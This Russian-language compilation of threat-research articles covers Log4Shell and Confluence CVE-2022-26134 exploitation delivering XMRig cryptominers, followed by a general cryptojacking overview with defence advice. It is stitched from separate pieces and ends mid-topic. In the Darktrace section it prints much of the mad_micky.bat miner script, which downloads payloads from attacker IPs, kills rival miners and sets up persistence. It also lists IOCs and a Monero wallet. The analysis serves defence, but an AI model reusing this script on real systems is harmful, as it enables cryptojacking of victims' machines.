
Уязвимость CVE-2021-44228 позволяет выполнять удалённый код без аутентификации в нескольких версиях Apache Log4j2 (Log4Shell). Атакующие могут эксплуатировать уязвимые серверы, подключаясь по любому протоколу, например HTTPS, и отправляя специально сформированную строку.
Команда Alibaba Cloud Security публично раскрыла критическую уязвимость (CVE-2021-44228), позволяющую неаутентифицированное удалённое выполнение кода в нескольких версиях Apache Log4j2 (Log4Shell). Атакующие могут эксплуатировать уязвимые серверы, подключаясь по любому протоколу, например HTTPS, и отправляя специально сформированную строку.
Darktrace обнаружила криптомайнинг у нескольких клиентов, возникший в результате эксплуатации этой уязвимости Log4j. В каждом из этих инцидентов эксплуатация происходила через исходящие SSL-соединения, которые, как представляется, являются запросами на получение base64-кодированных PowerShell-скриптов для обхода периметровой защиты и загрузки пакетных (.bat) файлов, а также нескольких исполняемых файлов, устанавливающих вредоносное ПО для криптомайнинга. Эта активность имела более широкие индикаторы кампании, включая общие прописанные в коде IP-адреса, исполняемые файлы и скрипты.
Цикл атаки начинается с, по-видимому, оппортунистического сканирования устройств, подключённых к интернету, в поисках серверов VMWare Horizons, уязвимых к эксплойту Log4j. После обнаружения уязвимого сервера атакующий устанавливает HTTP- и SSL-соединения с жертвой. После успешной эксплуатации сервер выполняет обратный вызов на порт 1389, получая скрипт с именем mad_micky.bat. Это позволяет достичь следующего:
По крайней мере в двух случаях скрипт mad_micky.bat был получен через HTTP-соединение, в котором использовался user-agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). Это был первый и единственный раз, когда этот user-agent наблюдался в этих сетях. Похоже, что этот user-agent легитимно используется некоторыми устройствами ASUS после заводской установки; однако, поскольку это новый user-agent, наблюдавшийся только во время этой активности, он вызывает подозрения.
После успешной эксплуатации сервер выполняет обратный вызов на порт 1389 для получения файлов скриптов. В этом примере /xms.ps1 — это base-64 кодированный PowerShell-скрипт, который обходит политику выполнения на хосте, чтобы вызвать ‘mad_micky.bat’:
Рисунок 1: Дополнительные сведения о PowerShell-скрипте xms.ps1
Снимок детализирует журнал событий затронутого сервера и указывает на успешное выполнение кода Log4j RCE, которое привело к загрузке файла mad_micky.bat:
Рисунок 2: Данные журнала с выделением файла mad_micky.bat
Были инициированы дополнительные соединения для получения исполняемых файлов и скриптов. Скрипты содержали два IP-адреса, расположенных в Корее и Украине. Было установлено соединение с украинским IP-адресом для загрузки исполняемого файла xm.exe, который активирует майнер. Майнер XMRig (в данном случае) — это открытый кроссплатформенный инструмент для майнинга, доступный для загрузки из множества публичных источников. Следующей загруженной exe-программой был ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).
Рисунок 3: Дополнительные сведения об исполняемом файле XMRig
Соединение с корейским IP-адресом включало запрос ещё одного скрипта (/2.ps1), а также исполняемого файла (LogBack.exe). Этот скрипт удаляет выполняющиеся задачи, связанные с журналированием, включая фильтр журнала событий SCM или подписчика журнала событий PowerShell. Скрипт также запрашивает файл с Pastebin, который, возможно, является конфигурационным файлом бекдора Cobalt Strike. Удаления журналов выполнялись через планировщик задач и WMI, включая: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.
Второй файл, запрошенный с Pastebin, хотя он больше не размещён на Pastebin, является частью команды schtasks и, вероятно, используется для обеспечения персистентности:
Исполняемый файл Logback.exe — это ещё один инструмент майнинга XMRig. С того же корейского IP-адреса был также загружен файл config.json. После этого для настройки майнера использовались команды cmd.exe и wmic.
За этими загрузками файлов и настройкой майнера последовали дополнительные соединения с Pastebin.
Рисунок 4: OSINT-корреляция файла mad_micky.bat
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
echo copying to mimu directory
if errorlevel 1 (
echo ERROR: Can’t download MoneroOcean advanced version of xmrig
goto MINER_BAD)echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
if errorlevel 1 (
echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
if %ADMIN% == 1 goto ADMIN_MINER_SETUP
if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
if errorlevel 1 (
echo ERROR: Can’t download tools to make gado_miner service
exit /b 1Ключевые срабатывания моделей, которые Darktrace использовала для выявления этой кампании, включают модели, ориентированные на компрометацию: Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server и Beaconing to Rare Destination. Модели, ориентированные на файлы: Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations и Compressed Content from Rare External Location. Криптовалютный майнинг обнаруживается с помощью моделей Cryptocurrency Mining Activity.
Модели, связанные с Unusual PowerShell to Rare and New User Agent, выделяют аномальные соединения на заражённых устройствах после обратных вызовов Log4j.
Клиенты, использующие технологию Autonomous Response компании Darktrace, Antigena, также могли блокировать загружаемые входящие файлы и скрипты и ограничивать заражённые устройства обычной моделью поведения, чтобы предотвратить как первоначальные загрузки вредоносных файлов, так и продолжающуюся активность криптомайнинга.
31 мая критическая неисправленная уязвимость, затрагивающая все поддерживаемые версии Confluence Server и Data Center, была сообщена в Atlassian компанией Volexity, занимающейся безопасностью.
Atlassian предупредила своих клиентов о критической уязвимости 2 июня и выпустила патч днём позже. CISA добавила эту уязвимость в свой список Known Exploited Vulnerabilities 3 июня.
Check Point выпустила специализированную защиту для предотвращения атак, эксплуатирующих эту уязвимость, и рекомендует клиентам установить обновления на затронутые системы.
Уязвимость
Уязвимость в Atlassian Confluence и Data Center, обозначенная как CVE-2022-26134, может привести к неаутентифицированной атаке с внедрением выражений на языке Object-Graph Navigation Language (OGNL).
Удалённый неаутентифицированный злоумышленник может использовать эту уязвимость для выполнения произвольного кода на целевом сервере, поместив вредоносную полезную нагрузку в URI.

Рисунок 1: Вредоносная полезная нагрузка, эксплуатирующая CVE-2022-26134.
Эксплуатация в дикой природе
Исследователи Check Point Research (CPR) заметили большое количество попыток эксплуатации с момента публикации уязвимости. Сначала многие из потенциальных злоумышленников использовали методы сканирования для выявления уязвимых целей. Через несколько дней злоумышленники начали использовать уязвимость для загрузки вредоносного ПО в затронутые системы.
Среди журналов эксплуатации исследователи заметили несколько вредоносных полезных нагрузок, связанных с одной и той же кампанией и происходящих из одного источника, но нацеленных на разные платформы: Linux и Windows.
Цепочка заражения зависит от операционной системы жертвы.
Целевая атака на ОС Linux
Злоумышленник использовал 0-day уязвимость Atlassian, отправив жертве специально сформированный HTTP-запрос.

Рисунок 2: Специально сформированный HTTP-запрос, эксплуатирующий CVE-2022-26134, с base64-кодированной полезной нагрузкой.
Base64-строка декодируется в другую base64-кодированную строку. В целом исследователям пришлось декодировать строку несколько раз, чтобы получить фактическую полезную нагрузку.

Рисунок 3: Декодированная base64-строка.
Этот скрипт загружает bash-скрипт под названием xms с удалённого C&C-сервера во временную папку жертвы, выполняет его, а затем удаляет.

Рисунок 4: Часть вредоносного скрипта xms.
Файл xms — это скрипт-дроппер. Он удаляет работающие агенты с машины жертвы и добавляет себя в задания cron для сохранения активности после перезагрузки.
Кроме того, постоянно выполняется проверка сетевого подключения к a[.]oracleservice.top.
Пытаясь распространиться на другие машины, скрипт ищет SSH-ключи и пытается подключиться. Затем он загружает файл xms с C&C-сервера и выполняет его.
Скрипт загружает исполняемый файл ELF под названием dbused в папку tmp на различных удалённых IP-адресах.
Файл dbused упакован с помощью UPX для избежания статического обнаружения.
ELF-файл — это криптомайнер, который истощает ресурсы машины жертвы:

Рисунок 5: Процесс dbused истощает системные ресурсы.
Целевая атака на ОС Windows
Злоумышленник использовал уязвимость Atlassian для выполнения загрузчика PowerShell (download cradle) с целью инициации бесфайловой атаки с удалённого C&C-сервера.

Рисунок 6: Специально сформированный HTTP-запрос, эксплуатирующий CVE-2022-26134 с помощью команд PowerShell.
Скрипт lol.ps1 внедряется в процесс PowerShell в памяти.
Скрипт проверяет архитектуру процессора с помощью wmi, чтобы убедиться, что она соответствует требованиям.
Затем он загружает исполняемый файл под названием checkit2 в папку tmp и запускает его в скрытом режиме.

Рисунок 7: Скрипт lol.ps1.
Процесс checkit2.exe порождает дочерний процесс под названием InstallUtil.exe, который подключается к C&C-серверу. В свою очередь, InstallUtil.exe порождает ещё один дочерний процесс, AddInProcess.exe, который является криптомайнером. Через несколько мгновений работы на машине жертвы процесс checkit2 завершает сам себя.
![]()
Рисунок 8: Процесс checkit2.exe, работающий в системе.
![]()
Рисунок 9: Процесс InstallUtil.exe, работающий в системе.
Вредоносная программа загружает свою новую копию под новым именем в папку меню «Пуск».

Рисунок 10: Файл cloud.exe, загруженный в папку автозагрузки.
Теперь криптомайнер работает на машине и истощает все ресурсы системы:
![]()
Рисунок 11: Информация о криптовалютном кошельке.
Цепочка атаки
Оба сценария атаки начинаются с первоначального специально сформированного HTTP-запроса, эксплуатирующего уязвимость CVE-2022-26134. Злоумышленник выполняет команды с помощью функции выполнения Java, чтобы загрузить вредоносную нагрузку на машину жертвы.
Затем вредоносная нагрузка загружает исполняемый файл в зависимости от затронутой ОС. Оба исполняемых файла запускают криптомайнер, чтобы использовать ресурсы жертвы в своих интересах.
Субъекты угроз
Домен a[.]oracleservice.top и криптовалютный кошелек, извлечённый нами из системы, связаны с киберпреступной группировкой под названием «8220 gang».
Защита Check Point:
IPS:
Atlassian Confluence Remote Code Execution (CVE-2022-26134)
Anti-Bot:
Trojan.WIN32.XMRig
IOCs:
198.251.86[.]46
51.79.175[.]139
167.114.114[.]169
146.59.198[.]38
51.255.171[.]23
a.oracleservice[.]top
d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e
2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0
4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9
4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0
Кошелёк Monero:
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
Криптоджекинг — это несанкционированное использование чужих вычислительных ресурсов для майнинга криптовалюты. Хакеры стремятся захватить любые системы, которые они могут контролировать — настольные компьютеры, серверы, облачную инфраструктуру и другое — для нелегального майнинга криптомонет.
Независимо от механизма доставки, код криптоджекинга обычно тихо работает в фоновом режиме, пока ничего не подозревающие жертвы используют свои системы обычным образом. Единственные признаки, которые они могут заметить, — это снижение производительности, задержки выполнения, перегрев, чрезмерное потребление электроэнергии или аномально высокие счета за облачные вычисления.
Майнинг монет — это легитимный процесс в мире криптовалют, который выпускает новую криптовалюту в обращение. Процесс работает следующим образом: вознаграждение получает первый майнер, решивший сложную вычислительную задачу. Эта задача завершает блоки проверенных транзакций, которые добавляются в блокчейн криптовалюты.
«Майнеры по сути получают оплату за свою работу аудиторов. Они выполняют работу по проверке легитимности транзакций Bitcoin», — говорится в недавнем материале Investopedia о том, как работает майнинг Bitcoin. «Помимо пополнения карманов майнеров и поддержки экосистемы Bitcoin, майнинг служит ещё одной важной цели: это единственный способ выпустить новую криптовалюту в обращение».
Добыча криптовалюты с помощью майнинга обычно требует огромного количества вычислительной мощности и энергии. Кроме того, экосистема криптовалют устроена так, что со временем и с ростом конкуренции в майнинге добыча становится сложнее, а вознаграждение уменьшается. Это делает легальный майнинг криптовалют чрезвычайно затратным делом, расходы на которое постоянно растут.
Методы атак ограничиваются лишь фантазией криптоджекеров, но ниже приведены одни из наиболее распространённых, используемых сегодня.
В прошлом криптоджекинг был в первую очередь атакой вредоносного ПО на конечные устройства и представлял собой ещё одну цель для заработка при доставке вредоносных программ на настольные компьютеры и ноутбуки. Традиционное вредоносное ПО для криптоджекинга доставляется типичными путями: бесфайловое вредоносное ПО, фишинговые схемы, внедрённые вредоносные скрипты на веб-сайтах и в веб-приложениях.
Самый простой способ, которым атакующие при криптоджекинге могут украсть ресурсы, — отправить пользователям конечных устройств письмо, выглядящее как легитимное, и побудить их перейти по ссылке, которая запускает код для размещения скрипта криптомайнинга на их компьютере. Скрипт работает в фоновом режиме и отправляет результаты обратно через инфраструктуру управления и контроля (C2).
Другой метод — внедрение скрипта на веб-сайт или в рекламное объявление, которое показывается на множестве сайтов. Как только жертвы заходят на сайт или заражённое объявление появляется в их браузерах, скрипт автоматически выполняется. При этом код не хранится на компьютерах жертв.
Эти пути по-прежнему остаются серьёзной проблемой, хотя преступники добавили значительно более сложные методы в свои сценарии криптоджекинга в стремлении увеличить прибыль; некоторые из этих развивающихся методов описаны ниже.
Атакующие стремятся повысить прибыльность криптоджекинга, расширяя свои горизонты на серверы, сетевые устройства и даже устройства IoT. Например, серверы являются особенно привлекательной целью, поскольку они обычно более мощные, чем обычный настольный компьютер. Они также являются отличным охотничьим угодьем в 2022 году: злоумышленники сканируют серверы, доступные из публичного интернета и содержащие такие уязвимости, как Log4J, эксплуатируют эту уязвимость и тихо загружают программное обеспечение для криптомайнинга в систему, подключённую к серверам хакера. Часто атакующие используют изначально скомпрометированную систему для латерального перемещения криптоджекинга на другие сетевые устройства.
«Мы наблюдаем рост криптомайнинга, вызванный уязвимостью Log4J», — говорит Салли Винсент, старший инженер по исследованию угроз в LogRhythm. «Хакеры проникают в сети и устанавливают вредоносное ПО, которое использует хранилище для майнинга криптовалют».
Киберпреступники нацеливаются на цепочку поставок программного обеспечения, внедряя в репозитории открытого кода вредоносные пакеты и библиотеки, содержащие встроенные скрипты криптоджекинга. Поскольку разработчики по всему миру загружают эти пакеты миллионами, такие атаки могут быстро масштабировать инфраструктуру криптоджекинга для злоумышленников двумя способами. Вредоносные пакеты могут использоваться для нацеливания на системы разработчиков — а также на сети и облачные ресурсы, к которым они подключаются, — чтобы использовать их напрямую как нелегальные ресурсы для криптомайнинга. Либо они могут использовать эти атаки для отравления программного обеспечения, которое создают разработчики, компонентами, выполняющими скрипты криптомайнинга на машинах конечных пользователей приложения.
Многие криптоджекинговые предприятия используют масштабируемость облачных ресурсов, взламывая облачную инфраструктуру и подключаясь к ещё более широкому набору вычислительных пулов для питания своей майнинговой деятельности. В исследовании прошлой осенью, проведённом Google Cybersecurity Action Team, сообщается, что 86% скомпрометированных облачных инстансов используются для криптомайнинга.
«Сегодня атакующие любыми средствами нацеливаются на облачные сервисы, чтобы добывать всё больше криптовалюты, поскольку облачные сервисы позволяют им выполнять свои вычисления в больших масштабах, чем на одной локальной машине, — будь то захват управляемого облачного окружения пользователя или даже злоупотребление SaaS-приложениями для выполнения вычислений», — написал в своём блоге Гай Арази, старший исследователь безопасности в Palo Alto Networks.
Один из распространённых методов — сканирование открытых API контейнеров или незащищённых облачных хранилищ и использование этого доступа для установки ПО для майнинга монет на затронутых экземплярах контейнеров или облачных серверах. Атака обычно автоматизируется с помощью сканирующего ПО, которое ищет серверы, доступные из публичного интернета, с открытыми API или возможностью неаутентифицированного доступа. Атакующие обычно используют скрипты для сброса полезной нагрузки майнера на исходную систему и для поиска способов распространения по связанным облачным системам.
«Прибыльность и лёгкость проведения криптоджекинга в масштабе делают этот тип атак низко висящим фруктом», — сказал Мэтт Мьюир, исследователь безопасности в Cado Security, в блоге, объясняя, что облачные атаки особенно выгодны. «Это, вероятно, будет продолжаться до тех пор, пока пользователи не перестанут открывать такие сервисы, как Docker и Redis, для недоверенных сетей».
Согласно отчёту ReasonLabs, за последний год 58.4% всех обнаруженных троянов были майнерами криптовалют с использованием криптоджекинга. Тем временем другое исследование SonicWall показало, что 2021 год стал худшим годом за всю историю по количеству атак криптоджекинга: в этой категории было зафиксировано 97.1 миллиона атак за год. Такие высокие показатели объясняются тем, что криптоджекинг для киберпреступников практически «печатает деньги».
Когда преступник может добывать криптовалюту на, казалось бы, безграничном пуле бесплатных вычислительных ресурсов с машин жертв, его выгода огромна. Даже после резкого падения стоимости Bitcoin этой весной, когда она опустилась ниже уровня $30,000, нелегальная маржа криптоджекеров остаётся экономически оправданной, поскольку стоимость добытого ими намного превышает затраты на их преступную инфраструктуру.
Ханипот команды исследователей безопасности из Cado Labs обнаружил многоступенчатую атаку криптоджекинга, которая нацелена на открытые конечные точки API Docker Engine и серверы Redis и может распространяться подобно червю. Атаку совершает группа WatchDog, которая была особенно активна в конце 2021 и в 2022 году, проводя многочисленные кампании криптоджекинга.
TeamTNT была одной из первых хакерских групп, которая сместила фокус криптоджекинга на облачные сервисы. Исследователи TrendMicro в конце 2021 года сообщили, что эта группа, наряду с такими соперниками, как банда Kinsig, проводила кампании криптоджекинга, устанавливая майнеры в инстансах Alibaba Elastic Computing Service (ECS) и отключая функции безопасности для уклонения от обнаружения.
Уязвимость Log4Shell стала подарком для атакующих с криптоджекингом в 2022 году. В одном из ярких примеров исследователи Sophos обнаружили ранее в этом году, что «орда» атакующих нацеливалась на серверы VMware Horizon, чтобы доставлять различные полезные нагрузки криптоджекинга, включая z0Miner, майнер JavaX и по крайней мере два варианта XMRig — ботов Jin и Mimu для майнинга криптовалют.
Эксперты Sonatype по безопасности цепочки поставок ПО осенью 2021 года подняли тревогу по поводу вредоносных пакетов для криптомайнинга, скрывающихся в npm — репозитории JavaScript-пакетов, используемом разработчиками по всему миру. Тогда было обнаружено три пакета, по крайней мере один из которых выдавал себя за популярную легитимную библиотеку, используемую разработчиками, под названием «ua-parser-js», которую загружают более 7 миллионов раз в неделю. Это был бы идеальный способ заманить разработчиков, чтобы они случайно загрузили вредоносный код и установили его в своё программное обеспечение.
Через несколько месяцев после этого отчёта исследователи WhiteSource (ныне Mend) опубликовали дополнительный отчёт, который показал, что npm кишит вредоносным кодом — до 1,300 вредоносных пакетов, включая криптоджекинг и другое преступное поведение.
Прошлым летом специалисты Bitdefender обнаружили румынскую хакерскую группу, которая нацеливалась на Linux-машины с использованием SSH-учётных данных для развёртывания майнера Monero. Используемые ими инструменты распространялись по модели «как услуга» (as-a-service). Этот пример находился на острие того, что, судя по всему, становится растущей тенденцией атак криптомайнинга на Linux-системы. Отчёт компании VMware, опубликованный ранее в этом году, подробно описывал рост нацеливания на многоблачные среды на базе Linux, особенно с использованием майнингового ПО XMRig.
«Многие образцы криптомайнеров из Linux-систем имеют некоторое отношение к приложению XMRig», — говорится в отчёте, который показал, что 89% атак криптомайнинга использовали библиотеки, связанные с XMRig. «Поэтому, когда в двоичных файлах Linux идентифицируются специфичные для XMRig библиотеки и модули, это, вероятно, является свидетельством потенциального поведения криптомайнинга».
CoinStop — ещё одна кампания криптоджекинга, недавно обнаруженная как нацеленная на азиатских облачных провайдеров (CSP). Эта кампания отличилась своими мерами антифорензики и уклонения. Они включали timestomping для манипулирования системными метками времени, удаление системных криптографических политик и использование файла устройства /dev/tcp для создания сеанса обратной оболочки, пояснил Мьюир из Cado в отчёте об этой атаке.
Криптоджекеры иногда могут пойти на многое, чтобы украсть не только вычислительную мощность, но также энергию и сетевые ресурсы корпоративной инфраструктуры. В прошлом году аналитики Darktrace рассказали об анонимном примере от одного из своих клиентов, где они обнаружили ферму криптомайнинга на складе, замаскированную под неприметный набор картонных коробок. Внутри находилась скрытная установка с несколькими GPU, которые были подключены к сети компании и электропитанию,
Поскольку криптоджекинг превратился в многовекторную атаку, охватывающую конечные точки, серверы и облачные ресурсы, предотвращение криптоджекинга требует скоординированной и всесторонней стратегии защиты. Следующие шаги могут помочь предотвратить бесконтрольное распространение криптоджекинга на корпоративных ресурсах.
Используйте надёжную защиту конечных точек: Основа этого — использование защиты конечных точек и антивирусного ПО, способных обнаруживать криптомайнеры, а также поддержание веб-фильтров в актуальном состоянии и управление расширениями браузера для минимизации риска выполнения скриптов в браузере. Организациям в идеале следует искать платформы защиты конечных точек, которые могут распространяться на серверы и далее.
Патчите и укрепляйте серверы (и всё остальное). Криптоджекеры обычно ищут самый лёгкий доступный плод, который можно тихо собирать, — включая сканирование публично открытых серверов со старыми уязвимостями. Базовая защита серверов, включающая установку исправлений, отключение неиспользуемых служб и ограничение внешней зоны видимости, может во многом помочь минимизировать риск серверных атак.
Используйте анализ состава программного обеспечения. Инструменты анализа состава программного обеспечения (SCA) обеспечивают лучшую видимость того, какие компоненты используются в программном обеспечении, для предотвращения атак на цепочку поставок, использующих скрипты майнинга монет.
Ищите ошибки конфигурации в облаке. Один из наиболее действенных способов остановить криптоджекинг в облаке — ужесточить настройки облака и контейнеров. Это означает поиск облачных сервисов, открытых для публичного интернета без надлежащей аутентификации, выявление открытых API-серверов и устранение учётных данных и других секретов, хранящихся в средах разработчиков и жёстко зашитых в приложения.
Криптоджекинг — это классическая медленная и скрытная кибератака, предназначенная для того, чтобы оставлять минимум следов и избегать долгосрочного обнаружения. Хотя платформы защиты конечных точек и технологии обнаружения и реагирования на конечных точках достигли большого прогресса в оповещении об атаках криптоджекинга, злоумышленники являются мастерами уклонения в этом отношении, и обнаружение нелегальных майнеров монет по-прежнему может быть сложным, особенно когда скомпрометировано лишь несколько систем. Ниже приведены некоторые дополнительные методы выявления признаков криптоджекинга.
Обучите свою службу поддержки выявлять признаки криптомайнинга. Иногда первым признаком на пользовательских конечных точках является всплеск жалоб в службу поддержки на медленную работу компьютера. Это должно стать красным флагом для дальнейшего расследования, как и перегрев устройств или плохая производительность аккумулятора на мобильных устройствах.
Разверните решение для мониторинга сети. Инструменты сетевого мониторинга могут стать мощным средством для выявления видов веб-трафика и исходящего C2-трафика, указывающих на активность криптоджекинга, независимо от того, с какого устройства они исходят.
«Если у вас есть хорошая фильтрация исходящего трафика на сервере, где вы отслеживаете исходящие попытки установления соединений, это может быть хорошим методом обнаружения [майнер-вредоносных программ], — говорит Трэвис Фаррал, вице-президент и директор по информационной безопасности (CISO) в Archaea Energy. Однако он предупреждает, что авторы криптомайнеров могут написать своё вредоносное ПО так, чтобы обойти этот метод обнаружения.
Используйте облачный мониторинг и безопасность среды выполнения контейнеров. Развивающиеся инструменты, такие как облачный мониторинг и сканирование безопасности среды выполнения контейнеров, могут обеспечить дополнительную видимость облачных сред, которые могут быть затронуты неавторизованными криптомайнерами. Облачные провайдеры встраивают такую видимость в свои сервисы, иногда в виде дополнительных модулей. Например, Google Cloud расширила свой Security Command Center ранее в этом году, включив в него то, что она называет Virtual Machine Threat Detection (VMTD), для выявления признаков криптомайнинга в облаке среди прочих облачных угроз.
Участвуйте в регулярной охоте за угрозами. Поскольку многие атаки криптоджекинга являются скрытными и оставляют мало следов, организациям может потребоваться принять более активные меры, такие как охота за угрозами, чтобы регулярно искать тонкие признаки компрометации и доводить расследования до конца.
«Группы обеспечения безопасности конечных точек и центры мониторинга безопасности (SOC) должны вкладывать время в активные упражнения и охоту за угрозами, а не ждать, пока произойдёт что-то потенциально катастрофическое», — говорит Винсент из LogRhythm.
Мониторьте свои веб-сайты на предмет кода криптомайнинга. Фаррал предупреждает, что криптоджекеры находят способы размещать фрагменты JavaScript-кода на веб-серверах. «Сам сервер не является целью, но любой посетитель самого веб-сайта [подвергается риску заражения]», — говорит он. Он рекомендует регулярно отслеживать изменения файлов на веб-сервере или изменения самих страниц.
После обнаружения нелегальной активности криптомайнинга реагирование на атаку криптоджекинга должно следовать стандартным шагам реагирования на инциденты, которые включают сдерживание, искоренение, восстановление и извлечение уроков. Некоторые советы по реагированию на атаку криптоджекинга включают:
Закройте скрипты, доставляемые через веб. Для атак JavaScript в браузере решение простое, как только криптомайнинг обнаружен: закройте вкладку браузера, на которой выполняется скрипт. ИТ-отдел должен отметить URL-адрес веб-сайта, являющегося источником скрипта, и обновить веб-фильтры компании, чтобы заблокировать его.
Завершите работу скомпрометированных экземпляров контейнеров. Неизменяемая облачная инфраструктура, такая как экземпляры контейнеров, скомпрометированные майнерами, также может быть обработана просто: завершите работу заражённых экземпляров контейнеров и начните с чистого листа. Однако организации должны разобраться в корневых причинах, которые привели к компрометации контейнера в первую очередь. Это означает поиск признаков того, что панель управления контейнерами и учётные данные были скомпрометированы, а также проверку связанных облачных ресурсов на признаки компрометации. Ключевым шагом является обеспечение того, чтобы новый образ контейнера, заменяющий старый, не был настроен аналогичным образом.
Сократите разрешения и перегенерируйте API-ключи. Для искоренения и полного восстановления после облачного криптоджекинга организациям потребуется сократить разрешения для затронутых облачных ресурсов (и связанных с ними) и перегенерировать API-ключи, чтобы предотвратить повторное проникновение злоумышленников в ту же облачную среду.
Учитесь и адаптируйтесь. Используйте этот опыт, чтобы лучше понять, как злоумышленнику удалось скомпрометировать ваши системы. Обновите обучение пользователей, службы поддержки, ИТ-отдела и SOC-аналитиков, чтобы они могли лучше выявлять попытки криптоджекинга и соответствующим образом реагировать.
Примечание редактора: Эта статья, первоначально опубликованная в феврале 2018 года, была обновлена с учётом новых исследований, лучших практик и примеров криптоджекинга.
Уязвимость Apache Log4j попала в мировые заголовки новостей с момента её обнаружения в начале декабря. Ошибка затронула огромное количество организаций по всему миру, пока группы безопасности изо всех сил пытались смягчить связанные с ней риски. Вот хронология ключевых событий, связанных с уязвимостью Log4j, по мере их развития.
